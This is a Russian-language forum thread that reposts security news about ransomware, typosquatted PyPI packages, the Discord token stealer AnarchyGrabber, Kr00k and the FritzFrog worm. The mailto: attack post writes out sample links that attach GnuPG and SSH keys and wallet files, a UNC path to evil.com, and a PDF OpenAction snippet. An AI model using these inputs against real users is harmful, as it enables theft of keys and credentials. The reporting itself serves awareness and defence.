Автор Тема: Все новости о вирусах и антивирусах  (Прочитано 50508 раз)

0 Пользователей и 1 Гость просматривают эту тему.

student

  • Супермодератор
  • Аксакал
  • *****
  • Спасибо
  • -> Вы поблагодарили: 38529
  • -> Вас поблагодарили: 36355
  • Сообщений: 16384
  • Респект: +2308/-0
Все новости о вирусах и антивирусах
« Ответ #375 : 21 Ноябрь 2019, 19:30:22 »
Злоумышленники перехитрили сами себя

Исследователи компании Trustwave сообщили о массированной вредоносной спам-кампании, в ходе которой злоумышленники под видом обновления операционной системы Windows пытаются распространять зловред-шифровальщик Cyborg. Момент для кампании выбран вполне удачно: с января Microsoft прекращает поддержку ОС Windows 7, так что многим консервативным пользователям придется переходить на более новые версии операционной системы. На это и рассчитывают организаторы атаки, снабжая свои сообщения заголовком Critical Microsoft Windows Update. В действительности под видом обновления ОС скрывается шифровальщик Cyborg, пользователям следует игнорировать подобные сообщения.

Впрочем, хорошая новость состоит в том, что атака в любом случае провалилась. Исполняемый файл-загрузчик Cyborg киберпреступники замаскировали под файл изображения JPEG. Сделано это, вероятно, чтобы избежать обнаружения защитными решениями. Однако хакеры не учли, что подобные файлы в Windows автоматически загружаются для просмотра в Photo viewer. При этом программа всего лишь выдает сообщение об ошибке файла – и запуска загрузки не происходит. Вредоносные функции будут активированы лишь при запуске файла в командной строке с уровнем привилегий администратора, но трудно представить, что пользователь пойдет на такие ухищрения. Специалисты Trustwave признаются, что и сами не понимают, почему организаторы атаки выбрали столь странный способ распространения вредоносного файла. Теоретически можно предположить, что загрузчик должен запускаться какой-то другой вредоносной программой, уже установленной на пользовательском устройстве. Однако гораздо более вероятно, что хакеры просто продемонстрировали низкий уровень технической осведомленности и, стараясь обмануть защитные решения, в конечном итоге обманули сами себя.

student

  • Супермодератор
  • Аксакал
  • *****
  • Спасибо
  • -> Вы поблагодарили: 38529
  • -> Вас поблагодарили: 36355
  • Сообщений: 16384
  • Респект: +2308/-0
Все новости о вирусах и антивирусах
« Ответ #376 : 01 Декабрь 2019, 20:06:09 »
Ryuk разбушевался: две крупных атаки за два дня

Крупная испанская компания Prosegur, работающая в сфере информационной безопасности, вынуждена была накануне отключить свою телекоммуникационную платформу. Причиной стала хакерская атака, инфицировавшая сети Prosegur вредоносным ПО. Чтобы избежать его распространения, администрация компании заблокировала доступ всех своих клиентов к сетевым ресурсам Prosegur, а ее сотрудники в офисах по всей Европе были отправлены по домам. Испанские СМИ сообщили, что сети Prosegur оказались инфицированы зловредом-шифровальщиком Ryuk, позже эту информацию подтвердили и представители самой компании. Ни о возможной сумме выкупа, ни о том, намерена ли компания вести переговоры с хакерами, в настоящее время ничего не известно.

Это уже вторая резонансная атака Ryuk за два дня. Днем ранее стало известно, что зловред инфицировал сети американской компании Virtual Care Provider Inc., которая обеспечивает хранение данных и доступ в интернет множеству медицинских учреждений в США. В результате более 100 домов престарелых лишились доступа к своим файлам, включая истории болезней и рецепты на приобретение медикаментов, жизненно необходимых для пациентов. За предоставление ключа для расшифровки файлов злоумышленники потребовали колоссальную сумму в 14 миллионов долларов.

student

  • Супермодератор
  • Аксакал
  • *****
  • Спасибо
  • -> Вы поблагодарили: 38529
  • -> Вас поблагодарили: 36355
  • Сообщений: 16384
  • Респект: +2308/-0
Все новости о вирусах и антивирусах
« Ответ #377 : 04 Декабрь 2019, 16:25:44 »
В каталоге Python-пакетов PyPI выявлены две вредоносные библиотеки
04.12.2019 10:07


В каталоге Python-пакетов PyPI (Python Package Index) обнаружены вредоносные пакеты "python3-dateutil" и "jeIlyfish", которые были загружены одним автором olgired2017 и маскировались под популярные пакеты "dateutil" и "jellyfish" (отличается использованием символа "I" (i) вместо "l" (L) в названии). После установки указанных пакетов на сервер злоумышленника отправлялись найденные в системе ключи шифрования и конфиденциальные данные пользователя. В настоящее время проблемные пакеты уже удалены из каталога PyPI.

Непосредственно вредоносный код присутствовал в пакете "jeIlyfish", а пакет "python3-dateutil" использовал его в качестве зависимости. Названия были выбраны из расчёта на невнимательных пользователей, допускающих опечатки при поиске (тайпсквоттинг). Вредоносный пакет "jeIlyfish" был загружен около года назад — 11 декабря 2018 года и оставался незамеченным. Пакет "python3-dateutil" был загружен 29 ноября 2019 года и через несколько дней вызвал подозрение у одного из разработчиков. Информация о числе установок вредоносных пакетов не приводится.

Пакет jellyfish включал в себя код, загружающий список хэшей из внешнего репозитория на базе GitLab. Разбор логики работы с этими хэшами показал, что они содержат скрипт, закодированный при помощи функции base64 и запускаемый после декодировки. Скрипт находил в системе ключи SSH и GPG, а также некоторые типы файлов из домашнего каталога и учётные данные для проектов PyCharm, после чего отправлял их на внешний сервер, запущенный в облачной инфраструктуре DigitalOcean.

student

  • Супермодератор
  • Аксакал
  • *****
  • Спасибо
  • -> Вы поблагодарили: 38529
  • -> Вас поблагодарили: 36355
  • Сообщений: 16384
  • Респект: +2308/-0
Все новости о вирусах и антивирусах
« Ответ #378 : 14 Декабрь 2019, 20:27:12 »
Участник «русской хакерской группы» приговорен к 6 годам тюрьмы в Великобритании

25-летний студент Зейн Кейзер из английского графства ЭсКЕКС приговорен к 6 годам тюрьмы по обвинениям в компьютерном взломе и мошенничестве, шантаже и отмывании денежных средств, полученных незаконным путем. По версии обвинения, Зейн на протяжении 6 лет был участником киберпреступной группировки Lurk, «прославившейся» атаками вредоносного ПО Reveton. Этот зловред был одним из «пионеров» эпохи шифровальщиков. Его атаки выдавались за блокировку пользовательских устройств правоохранительными органами (в частности, ФБР США), якобы наложенную за несуществующие правонарушения – чаще всего в этом качестве фигурировала причастность к распространению  задорнографических материалов.

Согласно оценкам следствия, за свою хакерскую карьеру Зейн Кейзер заработал порядка 700 тысяч фунтов. Не имея официальных источников дохода, он жил на широкую ногу, приобретая дорогие вещи, останавливаясь в роскошных отелях, участвуя в азартных играх с очень высокими ставками. Впервые он был арестован в 2014 году, однако вскоре отпущен на свободу из-за недостаточности улик. Но следователи не выпустили его из поля зрения и не прекратили работу. В 2017 Кейзер был арестован повторно – после того, как следствие смогло обнаружить принадлежащие ему криптовалютные счета с немалыми суммами. В результате хакер признал свою вину по ряду предъявленных обвинений. Помимо тюремного срока суд обязал его выплатить компенсацию в сумме 270 тысяч фунтов стерлингов, а также продать в счет компенсации принадлежащие ему часы Rolex (ориентировочной стоимостью в 5 тысяч фунтов).

В этой истории несколько удивляет то, что зарубежные СМИ продолжают называть хакерскую группировку Lurk российской. Действительно, в 2016 году в ходе совместной операции ЗСУ и МВД в России были задержаны около 50 участников этой группы. Но очевидно, что вместе с россиянами в атаках Reveton участвовали и жители других стран. Помимо Зейна Кейзера, можно вспомнить, например, бывшего инженера Microsoft Реймонда Одиджи Уадиале, приговоренного в прошлом году в США к 18 месяцам тюрьмы именно за распространение шифровальщика Reveton. Поэтому, вероятнее, было бы справедливее считать хакерскую группу международной.

student

  • Супермодератор
  • Аксакал
  • *****
  • Спасибо
  • -> Вы поблагодарили: 38529
  • -> Вас поблагодарили: 36355
  • Сообщений: 16384
  • Респект: +2308/-0
Все новости о вирусах и антивирусах
« Ответ #379 : 17 Январь 2020, 17:50:42 »
Эксперты предупредили о новом виде фишинговых атак
08:40 / 17 Января, 2020

Преступники изучают почтовые переписки жертв, чтобы обманом заставить их перейти на вредоносные сайты.

Киберпреступники начали использовать новую технику фишинга, чтобы обманом заставить сотрудников компаний устанавливать вредоносные программы, переводить деньги или передавать свои учетные данные.



Злоумышленники проникают в бизнес-каналы электронной почты, используя ранее скомпрометированные учетные данные (приобретенные на подпольных форумах, украденные или полученные путем брутфорса), и присоединяются к диалогу под видом одной из групп.

«Как только злоумышленники получают доступ к учетной записи, они начинают изучать переписки своих жертв и искать информацию о любых сделках, которые можно использовать в своих целях», — пояснили эксперты из компании Barracuda Networks.

Идея заключается в том, что злоумышленник эксплуатирует реальную личность, от ее имени осуществляя фишинговые атаки, которые жертва будет расценивать как сообщения, исходящие от доверенного источника.

Как отметили специалисты, киберпреступники активно используют данную технику атаки для компрометации компаний. В ходе анализа 500 тыс. электронных писем эксперты обнаружили, что перехват переписок вырос более чем на 400% в период с июля по ноябрь прошлого года. В большинстве случаев злоумышленники не используют скомпрометированную учетную запись для отправки фишингового сообщения, поскольку владелец аккаунта может обнаружить среди исходящих почтовых сообщений подозрительное письмо.

Вместо этого преступники используют домены, отличающиеся от оригинальных и доверенных URL-адресов одним или двумя символами. Преступники полагаются на то, что жертва не заметит изменения в домене и не заподозрит в обмане коллегу, клиента или партнера. Эксперты сообщили о случаях, когда злоумышленники неделями общались со своими предполагаемыми жертвами, чтобы обеспечить высокий уровень доверия.

student

  • Супермодератор
  • Аксакал
  • *****
  • Спасибо
  • -> Вы поблагодарили: 38529
  • -> Вас поблагодарили: 36355
  • Сообщений: 16384
  • Респект: +2308/-0
Все новости о вирусах и антивирусах
« Ответ #380 : 21 Февраль 2020, 10:34:19 »
Антивирус Microsoft появится на iOS и Android

Мобильное приложение Microsoft Defender сейчас находится в разработке, компания обещает выпустить его к концу года

К концу этого года Microsoft планирует выпустить антивирус Defender для мобильных устройств, работающих под управлением операционных систем Android и iOS. На текущий момент софтверный гигант разрабатывает соответствующие приложения, которые должны обеспечить защиту гаджетов от вирусов и прочего вредоносного ПО. Microsoft пока не раскрывает подробности относительно возможностей мобильного антивируса, более детальная информация будет представлена на международной конференции по информационной безопасности, которая пройдёт в Сан-Франциско на следующей неделе.

Год назад Microsoft запустила публичное тестирование своего антивируса Defender на macOS, в результате чего пришлось переименовать свою платформу в Microsoft Defender Advanced Threat Protection (ATP). Антивирусный клиент для Mac обеспечивает полную защиту от различных видов угроз, а также предоставляет возможность быстрого или полного сканирования. Мобильные клиенты Microsoft Defender, скорее всего, будут сильно отличаться от настольных версий, особенно учитывая тот факт, что iOS не позволяет приложениям осуществлять сканирование на iPhone или iPad. На Android проще, здесь уже существуют десятки антивирусных приложений, и Microsoft попытается занять достойное место среди них.

Одной из главных задач Defender для мобильных систем станет предотвращение фишинга. Опять же, как Microsoft удастся это провернуть на iOS, пока не ясно. Есть предположение, что антивирус будет доступен только корпоративным пользователям, поскольку оба приложения входят в состав корпоративной платформы безопасности Microsoft. Вместе с этим анонсом компания также объявила о старте тестирования Microsoft Defender для Linux.


student

  • Супермодератор
  • Аксакал
  • *****
  • Спасибо
  • -> Вы поблагодарили: 38529
  • -> Вас поблагодарили: 36355
  • Сообщений: 16384
  • Респект: +2308/-0
Все новости о вирусах и антивирусах
« Ответ #381 : 07 Март 2020, 21:25:05 »
Шифровальщик PwndLocker обезврежен

Исследователь компании Emsisoft Фабиан Уозар обнаружил возможность расшифровки данных, заблокированных шифровальщиком PwndLocker. Этот зловред появился сравнительно недавно, но уже успел заработать определенную «репутацию». Он используется в атаках на крупные компании и сети государственных организаций. За разблокировку зашифрованных данных операторы вредоносного ПО требуют выкуп в сумме от 175 до 660 тысяч долларов – в зависимости от объема заблокированной информации. Только за последнее время жертвами его атак стали административный округ Ласаль в штате Иллинойс (США) и сербский город Нови-Сад (известно, что в последнем случае шифровальщик заблокировал порядка 50 терабайт данных).

Изучив код PwndLocker, Уозар выявил в нем уязвимость, которая позволяет восстанавливать зашифрованные данные. Определенная сложность, правда, состоит в том, что для расшифровки требуется копия исполняемого файла PwndLocker, использованного в атаке. А киберпреступники удаляют его, запустив процесс шифрования. Однако жертвы атак могут воспользоваться инструментом Windows Shadow Explorer либо другими средствами восстановления удаленных файлов. Искомый файл может находиться в папках %Temp%, C:\User или %Appdata%. Его копию следует направить по электронной почте в компанию Emsisoft, и ее специалисты окажут помощь в бесплатном восстановлении зашифрованных данных.

student

  • Супермодератор
  • Аксакал
  • *****
  • Спасибо
  • -> Вы поблагодарили: 38529
  • -> Вас поблагодарили: 36355
  • Сообщений: 16384
  • Респект: +2308/-0
Все новости о вирусах и антивирусах
« Ответ #382 : 16 Март 2020, 20:42:11 »
Будьте осторожны: этот трекер коронавируса на Android блокирует смартфон и вымогает деньги

Как и другие вирусы-вымогатели, CovidLock за разблокировку устройства требует определённую сумму в биткоинах

Весь мир практически парализован пандемией коронавирусной инфекции Covid-19, и некоторые люди всячески пытаются извлечь выгоду из паники, которая с каждым днём нарастает. В придачу к завышенным ценам и дефициту самых необходимых вещей некоторые злоумышленники хотят заработать на доверчивых пользователях смартфонов. Специалисты компании DomainTools, которая специализируется на информационной безопасности, сообщили об обнаружении опасного приложения для Android, выдающего себя за трекер коронавируса.

В приложении прячется вирус-вымогатель CovidLock, который, используя уязвимости в безопасности системы, блокирует экран устройства и требует деньги. Вредоносное приложение распространяется посредством сторонних ресурсов, один из таких имеет домен coronavirusapp. Вымогатель выполняет атаку, активируя блокировку мобильного устройства. В Android Nougat и выше атака успешно осуществляется только в том случае, если пользователь не установил пароль блокировки на экране. Наиболее уязвимыми остаются старые смартфоны и планшеты.

Как только CovidLock попадает на устройство, на экран выводится баннер с требованием заплатить 100 долларов в биткоинах в течение 48 часов. Злоумышленники грозятся удалить контакты, фотографии и прочие файлы, хранящиеся на смартфоне. Кроме того, они утверждают, что располагают учётными записями пользователя, знают его местоположение и могут удалённо выполнить очистку данных на устройстве, если он не заплатит.

Будьте осторожны: этот трекер коронавируса на Android блокирует смартфон и вымогает деньги
К счастью, специалисты DomainTools создали ключи дешифрования для вымогателя, которые в ближайшее время будут опубликованы. Компания настойчиво рекомендует не загружать подобные приложения из непроверенных источников.

P. S. На Reddit уже подобрали пароль к блокировщику — 4865083501.

yzek65

  • Модератор
  • Аксакал
  • *****
  • Спасибо
  • -> Вы поблагодарили: 5227
  • -> Вас поблагодарили: 15390
  • Сообщений: 6639
  • Респект: +907/-0
Все новости о вирусах и антивирусах
« Ответ #383 : 25 Март 2020, 21:51:16 »
Выявлена неизвестная ранее вредоносная кампания Wildpressure

Эксперты глобального центра исследований и анализа угроз «Лаборатории Касперского» (GReAT) обнаружили целевую кампанию по распространению троянца Milum. Он позволяет получить дистанционное управление устройствами в различных компаниях, в том числе промышленных. Эта кампания, получившая название Wildpressure, все еще активна. В данный момент большинство ее жертв находится на Ближнем Востоке.

Спойлер   :
На данный момент эксперты смогли получить несколько почти идентичных образцов троянца Milum, которые не имеют общего кода ни с одной известной ранее APT-кампанией. Все они обладают возможностями для удаленного управления устройствами. В частности, троянец имеет следующие функции: загружать и выполнять команды от своего оператора; собирать различную информацию с атакованной машины и отправлять ее на командно-контрольный сервер; обновляться до более новой версии.

Исследователи GReAT стали первыми, кто зафиксировал деятельность троянца Milum в августе 2019 г. Исследование показало, что первые три образца были созданы еще в марте 2019 г. Используя имеющуюся телеметрию, эксперты сделали предположение, что большинство целей этой вредоносной кампании находятся на Ближнем Востоке.

Пока многое в отношении Wildpressure остается неясным, в том числе точный механизм распространения троянца Milum.

student

  • Супермодератор
  • Аксакал
  • *****
  • Спасибо
  • -> Вы поблагодарили: 38529
  • -> Вас поблагодарили: 36355
  • Сообщений: 16384
  • Респект: +2308/-0
Все новости о вирусах и антивирусах
« Ответ #384 : 26 Май 2020, 21:55:53 »
Discord внезапно начал красть пароли игроков
26.05.2020, Вт, 09:31,

Новая версия троянца AnarchyGrabber, распространяемая через геймерский мессенджер Discord, позволяет красть пользовательские пароли и токены сессий, а также атаковать френдов жертвы.

Новый троянец

Спойлер   :
Через геймерский мессенджер Discord распространяется видоизмененный троянец AnarchyGrabber, крадущий пароли и пользовательские токены, а также распространяющийся дальше по контактному листу. Как пишет издание Bleeping Computer, AnarchyGrabber — популярный троянец, который раздается бесплатно на хакерских форумах.

На Youtube есть немало видео, где описывается, как с помощью этого троянца красть токены пользовательских сессий в Discord. В описаниях под видео встречаются ссылки на этот вредонос. Злоумышленники рассылают его потенциальным жертвам через Discord под видом читов к играм, хакерских инструментов или пиратского ПО.

Сразу после установки в систему жертвы троянец модифицирует файлы JavaScript, относящиеся к клиенту Discord, благодаря чему становится возможным красть токены сессий. Эти токены позволяют посторонним заходить в Discord под именем жертвы атаки.

На днях была выпущена новая модификация вредоноса, способная перехватывать пользовательские пароли в нешифрованном виде, а также заставлять зараженный клиент Discord рассылать копии вредоноса по списку френдов пользователя. Перехваченные пароли потом могут быть использованы для атак на аккаунты в других ресурсах — пользователи довольно часто используют очень похожие пароли в нескольких местах сразу.

JavaScript и никаких процессов

Вредонос видоизменяет файл %AppData%\Discord\[version]\modules\discord_desktop_core\index.js так, чтобы тот подгружал дополнительные файлы JavaScript — в частности inject.js и затем discordmod.js. Эти скрипты разлогинивают пользователя и пытаются отключить двухфакторную авторизацию в клиенте после повторного входа пользователя в свой аккаунт. Далее используется система оповещения Webhook для отправки почтового адреса, IP-адреса, логина, пользовательского токена и пароля в канал Discord под управлением злоумышленников. Плюс к этом модифицированный клиент Discord на компьютере жертвы будет выполнять поступающие команды злоумышленников, в том числе, например, на рассылку всем контактам пользователя копии вредоносов — либо все того же троянца, либо какой-то другой программы.


Злоумышленники превращают клиент Discord во вредоносную программу

Пользователи, скорее всего, даже не поймут, что они заражены. Вредоносный процесс как таковой отсутствует, антивирусы, скорее всего, не среагируют. Проверить, заражен ли пользователь Discord, можно только вручную. Для этого надо открыть файл index.js (%AppData%\Discord\[version]\modules\discord_desktop_core\index.js) и удостовериться, что строка module.exports выглядит следующим образом: module.exports = require('./core.asar').

Если это не так, то клиент Discord скомпрометирован. Проблему относительно легко можно решить путем переустановки клиента Discord, говорит Анастасия Мельникова, эксперт по информационной безопасности компании SEC Consult Services. «А чтобы предохраниться от дальнейших случаев заражения, не следует открывать никаких файлов, пересланных через Discord, не удостоверившись в источнике через другие каналы связи (по телефону или электронной почте)», — отмечает она.

student

  • Супермодератор
  • Аксакал
  • *****
  • Спасибо
  • -> Вы поблагодарили: 38529
  • -> Вас поблагодарили: 36355
  • Сообщений: 16384
  • Респект: +2308/-0
Все новости о вирусах и антивирусах
« Ответ #385 : 08 Август 2020, 19:25:40 »
Уязвимость в чипах Qualcomm и MediaTek, позволяющая перехватить часть трафика WPA2
07.08.2020 23:00

Исследователи из компании Eset выявили новый вариант (CVE-2020-3702) уязвимости Kr00k, применимый к беспроводным чипам Qualcomm и MediaTek. Как и первый вариант, которому были подвержены чипы Cypress и Broadcom, новая уязвимость позволяет дешифровать перехваченный Wi-Fi трафик, защищённый с использованием протокола WPA2.

Напомним, что уязвимость Kr00k вызвана некорректной обработкой ключей шифрования при отсоединении (диссоциации) устройства от точки доступа. В первом варианте уязвимости при отсоединении выполнялось обнуление сессионного ключа (PTK), хранимого в памяти чипа, так как дальнейшая отправка данных в текущем сеансе производиться не будет. При этом оставшиеся в буфере передачи (TX) данные шифровались уже очищенным ключом, состоящим только из нулей и, соответственно, могли быть легко расшифрованы при перехвате. Пустой ключ применяется только к остаточным данным в буфере, размер которого составляет несколько килобайт.

Спойлер   :
Ключевым отличием второго варианта уязвимости, проявляющейся в чипах Qualcomm и MediaTek, является то, что вместо шифрования нулевым ключом данные после диссоциации передаются вообще не зашифрованными, несмотря на то, что флаги шифрования устанавливаются. Из протестированных на наличие уязвимости устройств на базе чипов Qualcomm отмечены D-Link DCH-G020 Smart Home Hub и открытый маршрутизатор Turris Omnia. Из устройств на базе чипов MediaTek протестирован маршрутизатор ASUS RT-AC52U и IoT-решения на базе Microsoft Azure Sphere, использующие микроконтроллер MediaTek MT3620.

Для эксплуатации обоих вариантов уязвимостей атакующий может отправить специальные управляющие кадры, вызывающие диссоциацию, и перехватить отправляемые следом данные. Диссоциация обычно применяется в беспроводных сетях для переключения с одной точки доступа на другую во время роуминга или при потере связи с текущей точкой доступа. Диссоциацию можно вызвать отправкой управляющего кадра, который передаётся в незашифрованном виде и не требует аутентификации (атакующему достаточно достижимости Wi-Fi сигнала, но не требуется подключение к беспроводной сети). Проведение атаки возможно как при обращении уязвимого клиентского устройства к неуязвимой точке доступа, так и в случае обращения не подверженного проблеме устройства к точке доступа, на которой проявляется уязвимость.

Уязвимость затрагивает шифрование на уровне беспроводной сети и позволяет проанализировать лишь устанавливаемые пользователем незащищённые соединения (например, DNS, HTTP и почтовый трафик), но не даёт возможность скомпрометировать соединения с шифрованием на уровне приложения (HTTPS, SSH, STARTTLS, DNS over TLS, VPN и т.п.). Опасность атаки также снижает то, что за раз атакующий может расшифровать только несколько килобайтов данных, которые находились во время отсоединения в буфере передачи. Для успешного захвата отправляемых через незащищённое соединение конфиденциальных данных, атакующий либо должен точно знать момент их отправки, либо постоянно инициировать отсоединение от точки доступа, что бросится в глаза пользователю из-за постоянных перезапусков беспроводного соединения.

Проблема устранена в июльском обновлении проприетарных драйверов к чипам Qualcomm и в апрельском обновлении драйверов для чипов MediaTek. Исправление для MT3620 было предложено в июле. О включении исправлений в свободный драйвер ath9k у выявивших проблему исследователей информации нет. Для тестирования устройств на подверженность обоих вариантов уязвимости подготовлен скрипт на языке Python.

Дополнительно можно отметить выявление исследователями из компании Сheckpoint шести уязвимостей в DSP-чипах Qualcomm, которые применяются на 40% смартфонов, включая устройства от Google, Samsung, LG, Xiaomi и OnePlus. До устранения проблем производителями детали об уязвимостях не сообщаются. Так как DSP-чип представляет собой "чёрный ящик", который не может контролировать производитель смартфона, исправление может затянуться и потребует координации работ с производителем DSP-чипов.

DSP-чипы используются в современных смартфонах для совершения таких операций как обработка звука, изображений и видео, в вычислениях для систем дополненной реальности, компьютерного зрения и машинного обучения, а также в реализации режима быстрой зарядки. Среди атак, которые позволяют провести выявленные уязвимости, упоминаются: Обход системы разграничения доступа - незаметный захват данных, таких как фотографии, видео, записи звонков, данные с микрофона, GPS и т.п. Отказ в обслуживании - блокирование доступа ко всей сохранённой информации. Скрытие вредоносной активности - создание полностью незаметных и неудаляемых вредоносных компонентов.

student

  • Супермодератор
  • Аксакал
  • *****
  • Спасибо
  • -> Вы поблагодарили: 38529
  • -> Вас поблагодарили: 36355
  • Сообщений: 16384
  • Респект: +2308/-0
Все новости о вирусах и антивирусах
« Ответ #386 : 19 Август 2020, 19:48:17 »
 Атака на пользователей почтовых клиентов при помощи ссылок "mailto:"
19.08.2020 13:59

Исследователи из Рурского университета в Бохуме (Германия) проанализировали (PDF) поведение почтовых клиентов при обработке ссылок "mailto:" с расширенными параметрами. Пять из двадцати рассмотренных почтовых клиентов оказались уязвимы для атаки, манипулирующей подстановкой ресурсов при помощи параметра "attach". Ещё шесть почтовых клиентов были подвержены атаке по замене ключей PGP и S/MIME, а три клиента оказались уязвимы для атаки по извлечению содержимого зашифрованных сообщений.

Спойлер   :
Ссылки "mailto:" применяются для автоматизации открытия почтового клиента с целью написания письма заданному в ссылке адресату. Кроме адреса в составе ссылки можно указать дополнительные параметры, такие как тема письма и шаблон типового содержимого. Предложенная атака манипулирует параметром "attach", позволяющем прикрепить к создаваемому письму вложение.

Почтовые клиенты Thunderbird, GNOME Evolution (CVE-2020-11879), KDE KMail (CVE-2020-11880), IBM/HCL Notes (CVE-2020-4089) и Pegasus Mail оказались уязвимы тривиальной атаке, позволяющей автоматически прикрепить любой локальный файл, указанный через ссылку вида "mailto:?attach=путь_к_файлу". Файл прикрепляется без вывода предупреждения, поэтому без специального акцентирования внимания пользователь может не заметить, что письмо будет отправлено с прикреплением вложением.

Например, при помощи ссылки вида "mailto:?to=user@example.com&subject=Title&body=Text&attach=~/.gnupg/secring.gpg" можно подставить в письмо закрытые ключи от GnuPG. Также можно отправить содержимое криптокошельков (~/.bitcoin/wallet.dat), SSH-ключи (~/.ssh/id_rsa) и любые доступные пользователю файлы. Более того, Thunderbird позволяет прикреплять группы файлов по маске при помощи конструкций вида "attach=/tmp/*.txt".

Кроме локальных файлов некоторые почтовые клиенты обрабатывают ссылки на сетевые хранилища и пути в IMAP-сервере. В частности, IBM Notes позволяет передать файл из сетевого каталога при обработке ссылок вида "attach=\\evil.com\dummyfile", а также перехватить параметры аутентификации NTLM направив ссылку на SMB-сервер, подконтрольный атакующему (запрос будет отправлен с текущими параметрами аутентификации пользователя).

Thunderbird успешно обрабатывает запросы вида "attach=imap:///fetch>UID>/INBOX>1/", позволяющие прикрепить содержимое из папок на IMAP-сервере. При этом извлекаемые из IMAP письма, зашифрованные через OpenPGP и S/MIME, автоматически расшифровываются почтовым клиентом перед отправкой. Разработчики Thunderbird были уведомлены о проблеме в феврале и в выпуске Thunderbird 78 проблема уже устранена (ветки Thunderbird 52, 60 и 68 остаются уязвимыми).

Старые версии Thunderbird оказались уязвимы и для двух других вариантов атаки на PGP и S/MIME, предложенных исследователями. В частности, к Thunderbird, а также к OutLook, PostBox, eM Client, MailMate и R2Mail2 оказалась применима атака по замене ключей, вызванная тем, что почтовый клиент автоматически импортирует и устанавливает новые сертификаты, передаваемые в сообщениях S/MIME, что позволяет атакующему организовать подмену уже сохранённых у пользователя открытых ключей.

Вторая атака, которой подвержены Thunderbird, PostBox и MailMate, манипулирует особенностями механизма автосохранения черновиков сообщений и позволяет при помощи параметров mailto инициировать расшифровку зашифрованных сообщений или добавление цифровой подписи для произвольных сообщений, с последующей передачей результата на IMAP-сервер атакующего. Шифротекст при данной атаке передаётся через парметр "body", а для инициирования обращения к IMAP-серверу атакующего применяется тег "meta refresh". Например: '<meta http-equiv="refresh" content="60; URL=mailto:?body=-----BEGIN PGP MESSAGE-----[...]-----END PGP MESSAGE-----">'

Для автоматической обработки ссылок "mailto:" без участия пользователя могут применяться специально оформленные документы PDF - действие OpenAction в PDF позволяет автоматически запустить обработчик mailto при открытии документа:


   %PDF-1.5
   1 0 obj
   << /Type /Catalog /OpenAction [2 0 R] >>
   endobj
   
   2 0 obj
   << /Type /Action /S /URI/URI (mailto:?body=-----BEGIN PGP MESSAGE-----[...])>>
   endobj


student

  • Супермодератор
  • Аксакал
  • *****
  • Спасибо
  • -> Вы поблагодарили: 38529
  • -> Вас поблагодарили: 36355
  • Сообщений: 16384
  • Респект: +2308/-0
Все новости о вирусах и антивирусах
« Ответ #387 : 20 Август 2020, 14:52:28 »
Выявлен червь FritzFrog, поражающий серверы по SSH и строящий децентрализованный ботнет
20.08.2020 11:16

Компания Guardicore, специализирующаяся на защите датацентров и облачных систем, выявила новое высокотехнологичное вредоносное ПО FritzFrog, поражающее серверы на базе Linux. FritzFrog сочетает в себе червь, распространяющийся через bruteforce-атаку на серверы с открытым портом SSH, и компоненты для построения децентрализованного ботнета, работающего без управляющих узлов и не имеющего единой точки отказа.

Спойлер   :
Для построения ботнента применяется собственный P2P-протокол, в котором узлы взаимодействуют между собой, координируют организацию атак, поддерживают работу сети и контролируют состояние друг друга. Новые жертвы находятся путём проведения bruteforce-атаки на серверы, принимающие запросы по SSH. При обнаружении нового сервера выполняется перебор по словарю типовых сочетаний из логинов и паролей. Управление может производиться через любой узел, что усложняет выявление и блокирование операторов ботнета.

По данным исследователей ботнет уже насчитывает около 500 узлов, в числе которых оказались серверы нескольких университетов и крупной железнодорожной компании. Отмечается, что основной целью атаки являются сети образовательных учреждений, медицинских центров, государственных учреждений, банков и телекоммуникационных компаний. После компрометации сервера на нём организуется процесс майнинга крипотвалюты Monero. Активность рассматриваемого вредоносного ПО прослеживается с января 2020 года.

Особенностью FritzFrog является то, что он держит все данные и исполняемый код только в памяти. Изменения на диске сводятся только к добавлению нового SSH-ключа в файл authorized_keys, который в дальнейшем используется для доступа к серверу. Системные файлы не изменяются, что делает червь незаметным для систем проверяющих целостность по контрольным суммам. В памяти в том числе держатся словари для перебора паролей и данные для майнинга, которые синхронизируются между узлами при помощи P2P-протокола.

Вредоносные компоненты камуфлируются под процессы "ifconfig", "libexec", "php-fpm" и "nginx". Узлы ботнета отслеживают состояние соседей и в случае перезагрузки сервера или даже переустановки ОС (если в новую систему был перенесён изменённый файл authorized_keys) повторно активируют вредоносные компоненты на хосте. Для коммуникации используется штатный SSH - вредоносное ПО дополнительно запускает локальный "netcat", привязывающийся к интерфейсу localhost и слушающий трафик на порту 1234, к которому внешние узлы обращаются через SSH-туннель, используя для подключения ключ из authorized_keys.

Код компонентов FritzFrog написан на языке Go и работает в многопоточном режиме. Вредоносное ПО включает несколько модулей, запускаемых в разных потоках:

    Cracker - выполняет подбор паролей на атакуемых серверах.
    CryptoComm + Parser - организует шифрованное P2P-соединение.
    CastVotes - механизм совместного выбора целевых хостов для атаки.
    TargetFeed - получает список узлов для атаки от соседних узлов.
    DeployMgmt - реализация червя, распространяющего вредоносный код на взломанный сервер.
    Owned - отвечает за соединение к серверам, на которых уже запущен вредоносный код.
    Assemble - собирает файл в памяти из отдельно передаваемых блоков.
    Antivir - модуль подавления конкурирующих вредоносных программ, определяет и завершает процессы со строкой "xmr", потребляющие ресурсы CPU.
    Libexec - модуль для майнинга криповалюты Monero.

Применяемый в FritzFrog P2P-протокол поддерживает около 30 команд, отвечающих за передачу данных между узлами, запуск скриптов, передачу компонентов вредоносного ПО, опрос состояния, обмен логами, запуск прокси и т.п. Информация передаётся по отдельному шифрованному каналу с сериализацией в формат JSON. Для шифрования применяется ассиметричный шифр AES и кодирование Base64. Для обмена ключами используется протокол DH (Diffie-Hellman). Для определения состояния узлы постоянно обмениваются ping-запросами.

Все узлы ботнета поддерживают распределённую БД с информацией об атакуемых и скомпрометированных системах. Цели для атаки синхронизируются по всему ботнету - каждый узел атакует отдельную цель, т.е. два разных узла ботнента не будут атаковать один и тот же хост. Узлы также собирают и передают соседям локальную статистику, такую как размер свободной памяти, uptime, нагрузка на CPU и активность входов по SSH. Данная информация используется для решения о запуске процесса майнинга или использования узла только для атаки других систем (например, майнинг не запускается на нагруженных системах или системах с частым подключением администратора).

